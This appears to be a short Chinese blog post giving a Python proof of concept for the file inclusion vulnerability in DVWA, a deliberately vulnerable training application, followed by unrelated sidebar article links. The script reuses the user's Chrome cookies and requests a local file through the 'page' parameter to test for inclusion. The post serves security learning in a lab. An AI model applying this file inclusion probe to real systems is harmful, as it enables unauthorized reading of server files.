当前位置:网站首页>POC——DVWA‘s File Inclusion
POC——DVWA‘s File Inclusion
2022-07-19 04:59:00 【wavesky111】
Verification of file containing vulnerability POC Relatively simple , Only get Just visit . But there is a premise —— The file to be used has been transferred to the other server , And specify the location of the files used ~
import requests
import browser_cookie3
cookie = browser_cookie3.chrome()
url = r"http://192.168.117.130/DVWA-1.9/vulnerabilities/fi/?page=file:///C:\Users\wavesky\Desktop/1.txt"
response = requests.get(url=url,cookies=cookie)
re = 'PHP Version'
flag=re in str(response.content)
if flag:
print("It looks likely vulnerable")
else:
print("It is strong")Three Level All possible , Go straight to the next one ~
边栏推荐
- Blessing for the elderly popular short video wechat applet source code download support traffic master
- One article to understand Zipkin
- Learn about the configuration center
- Shallow chat link tracking
- Yiwen takes you to know about haproxy
- Add SSL certificate for load balancing
- Some concepts of ES
- 接口的参数返回封装类Result
- Es document operation
- 负载均衡添加ssl证书
猜你喜欢
随机推荐
ES文档操作
One article to understand Zipkin
模板类的声明和定义
PingCAP Clinic 数据采集说明
Overview of CKA core knowledge points
CVE-2021-44228 Log4j 复现及原理
Basic operations of index library operation
解决[email protected]: `node install.js` 的问题
银行联行号cnasp&查询(二)
MYSQL模糊匹配1,11,111这种相似字符串问题
Quickly master Mipi development strategy
负载均衡器ribbon实战
redis 安装
Using circular statements to make login programs
Cve-2021-44228 log4j reproduction and principle
Money making master applet [latest version 5.9.9] mall / instant withdrawal of commission / distribution promotion / phone recharge / is meituan hungry for takeout
用户管理-分页
Database and the future of open source
TiDB 性能优化概述
Shallow chat link tracking








